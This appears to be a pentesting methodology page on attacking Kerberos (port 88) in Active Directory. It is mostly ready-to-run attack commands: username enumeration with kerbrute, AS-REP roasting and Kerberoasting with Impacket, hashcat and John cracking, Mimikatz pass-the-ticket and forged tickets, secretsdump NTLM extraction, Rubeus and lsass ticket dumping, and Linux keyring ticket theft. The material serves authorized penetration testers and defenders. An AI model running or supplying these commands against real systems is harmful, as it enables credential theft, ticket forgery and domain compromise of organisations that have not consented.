Kerberos - Port 88

Master pentesting Kerberos on port 88 with VeryLazyTech’s lazy methodology—exploits included!

Support VeryLazyTech 🎉

Basic Information

Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.

In environments like Active Directory, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.

After authentication by Kerberos, the decision-making process regarding access to resources is delegated to individual services within the network. These services are then responsible for evaluating the authenticated user's rights and permissions, based on the information provided by Kerberos about the user's privileges. This design allows for a separation of concerns between authenticating the identity of users and managing their access rights, enabling a more flexible and secure approach to resource management in distributed networks.

To learn how to abuse Kerberos you should read the post about Active Directory.

Default Port: 88/tcp/udp

PORT   STATE SERVICE
88/tcp open  kerberos-sec

Discovering Kerberos Services

The first step is identifying Kerberos services on the target network. Port scanning tools are essential here.

  1. Nmap Scan for Kerberos (Port 88):

    nmap -p 88 --open -sU -sT <target IP> -Pn -oN kerberos_scan.txt
    • This command performs both TCP and UDP scans to identify open Kerberos ports. Scanning both protocols is crucial since Kerberos can operate on either.

  2. Masscan for Larger Networks:

    masscan -p88 --rate=1000 <target network>
    • Masscan is faster than Nmap for large networks, though it may not be as precise. After detecting Kerberos, use Nmap to gather more detailed information.


Enumerate Kerberos User Accounts

User account enumeration is a powerful starting point in Kerberos. Attackers can brute-force or enumerate valid usernames.

  1. Kerbrute:

    kerbrute userenum -d <domain> -U <userlist.txt> <target IP>
    • Kerbrute is designed specifically for brute-forcing Kerberos usernames and can provide insight into valid users within the domain.

  2. Impacket’s GetNPUsers.py for AS-REP Roasting:

    GetNPUsers.py <domain> -usersfile users.txt -format john -outputfile hashes.txt
    • If pre-authentication is disabled, GetNPUsers.py helps identify accounts vulnerable to AS-REP roasting by obtaining encrypted data that can be cracked offline.

  3. RPCClient User Enumeration:

    rpcclient -U "" -N <target IP>
    • rpcclient can be used to enumerate usernames if anonymous login is allowed on the server. This step often supplements Kerberos user enumeration.


Testing for Pre-Authentication Bypass (AS-REP Roasting)

AS-REP roasting exploits accounts without pre-authentication enabled, allowing attackers to retrieve an encrypted timestamp that can be brute-forced offline.

  1. Impacket’s GetNPUsers.py (for AS-REP Roasting):

    GetNPUsers.py <domain> -usersfile <userlist.txt> -no-pass -dc-ip <target IP>
    • Running this without passwords will attempt to identify accounts where pre-authentication is disabled, providing hashes that attackers can brute-force offline.

  2. Offline Cracking with Hashcat:

    hashcat -m 18200 hashes.txt wordlist.txt
    • Hashcat, using mode 18200, cracks AS-REP hashes. Use a robust wordlist to attempt decrypting the hash for possible credentials.


Performing Kerberoasting

Kerberoasting targets service accounts, allowing attackers to obtain service principal names (SPNs) and then request a ticket to perform offline cracking.

  1. Gather SPNs with Impacket’s GetUserSPNs.py:

    GetUserSPNs.py <domain>/<user>:<password> -dc-ip <target IP> -request
    • This command extracts SPNs, which are service accounts registered within Active Directory. By obtaining these SPNs, attackers can attempt to crack them offline.

  2. Using Rubeus for Kerberoasting (on Windows):

    Rubeus.exe kerberoast
    • Rubeus is a powerful Kerberos manipulation tool. The kerberoast command will list all the service tickets that can be used for offline cracking.

  3. Offline Cracking with John the Ripper:

    john --wordlist=wordlist.txt hashes.txt
    • John the Ripper can also be used to crack service account hashes extracted via Kerberoasting, especially if hashcat isn’t available.


Pass-the-Ticket (PTT) and Silver Ticket Attacks

In Kerberos, tickets play a crucial role. Attackers who obtain tickets can impersonate legitimate users.

  1. Mimikatz for Pass-the-Ticket Attack:

    mimikatz # kerberos::ptt <ticket.kirbi>
    • Mimikatz allows attackers to inject Kerberos tickets into their session, granting them access to services or resources as the user associated with the ticket.

  2. Generating a Silver Ticket with Mimikatz:

    mimikatz # kerberos::golden /domain:<domain> /sid:<domain SID> /target:<service or host> /rc4:<NTLM hash> /user:<username>
    • ExplanationSilver tickets are forged tickets that target specific services rather than domain-wide (as with Golden Tickets). Silver tickets provide long-term access to a particular service without interacting with the domain controller.

  3. Rubeus for Ticket Extraction:

    Rubeus.exe dump
    • Rubeus can extract all active Kerberos tickets on the machine, providing the attacker with potentially reusable tickets for Pass-the-Ticket attacks.


Password Cracking with AS-REP and Kerberoast Hashes

Offline password cracking is a critical step after obtaining AS-REP or Kerberoast hashes.

  1. Hashcat Cracking for Kerberoast Hashes:

    hashcat -m 13100 <hashes.txt> <wordlist>
    • Mode 13100 in Hashcat is dedicated to Kerberoast hash cracking. This approach can potentially yield the plaintext password of service accounts if a match is found in the wordlist.

  2. Password Cracking with John the Ripper (Kerberoasting):

    john --format=krb5tgs --wordlist=<wordlist.txt> hashes.txt
    • John the Ripper provides a krb5tgs format specifically for Kerberos TGS (Ticket Granting Service) hashes, allowing for flexible wordlist cracking.


PowerView: This is a PowerShell tool useful for enumerating Active Directory objects, including SPNs, permissions, and trust relationships.

Import-Module PowerView.ps1
Get-DomainUser -SPN

PowerView provides extensive Active Directory enumeration and is instrumental in identifying Kerberos accounts, SPNs, and potential targets for privilege escalation.

GPPPassword (for Credential Discovery): Although not directly a Kerberos tool, GPPPassword can extract plaintext passwords from Group Policy Preferences, which can sometimes grant access to Kerberos service accounts.

secretsdump.py -just-dc-ntlm <domain>/<user>:<password>@<DC IP>

Harvesting tickets from Windows

Tickets in Windows are managed and stored by the lsass (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools Mimikatz and Rubeus are widely employed, each offering different commands and functionalities.

Mimikatz

Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

When using these commands, ensure to replace placeholders like <BASE64_TICKET> and <luid> with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.


Harvesting tickets from Linux

Credential Storage in Linux

Linux systems store credentials in three types of caches, namely Files (in /tmp directory), Kernel Keyrings (a special segment in the Linux kernel), and Process Memory (for single-process use). The default_ccache_name variable in /etc/krb5.conf reveals the storage type in use, defaulting to FILE:/tmp/krb5cc_%{uid} if not specified.

Extracting Credentials

The 2017 paper, Kerberos Credential Thievery (GNU/Linux), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys.

Keyring Extraction Overview

The keyctl system call, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The hercules.sh script from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft.

Ticket Extraction Tool: Tickey

Building on the principles of the hercules.sh script, the tickey tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i.

Last updated

Was this helpful?